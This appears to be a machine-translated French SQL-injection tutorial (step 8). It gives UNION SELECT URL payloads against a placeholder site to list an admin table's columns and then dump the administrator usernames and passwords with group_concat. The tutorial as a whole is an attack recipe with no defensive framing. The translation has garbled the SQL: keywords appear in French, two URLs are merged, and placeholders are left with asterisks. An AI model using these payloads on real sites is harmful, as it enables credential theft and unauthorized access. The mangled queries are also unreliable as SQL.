Étape 8: Trouver de l’administrateur nom d’utilisateur et mot de passe - partie 1
Il s’agit de la dernière étape, supprimer les commandes qui est "BOLD":
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1, group_concat (nom_colonne), 3,4,5,6,7,8 de information_schema.columns où table_name = 0x6e696674795f61646d696e--
Voici l’adresse de Web, vous vous retrouvez avec :
http://Vulnerable.com/goodies.php?ID=-1/Buy.php?ID=-1 union select 1, group_concat (), 3,4,5,6,7, 8 de
Maintenant, entre les supports de la commande group_concat(), tapez les mots suivants :
* Username_Column *, 0x20616e6420, * Password_Column *
Veillez à remplacer * Username_Column * avec votre nom de la colonne nom d’utilisateur et le * Password_Column * avec le nom de colonne de votre mot de passe (dans mon cas, admin est le nom de colonne de nom d’utilisateur et le pass est le nom de colonne de mot de passe)
Votre adresse web ressemblera maintenant à quelque chose comme ceci :
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 de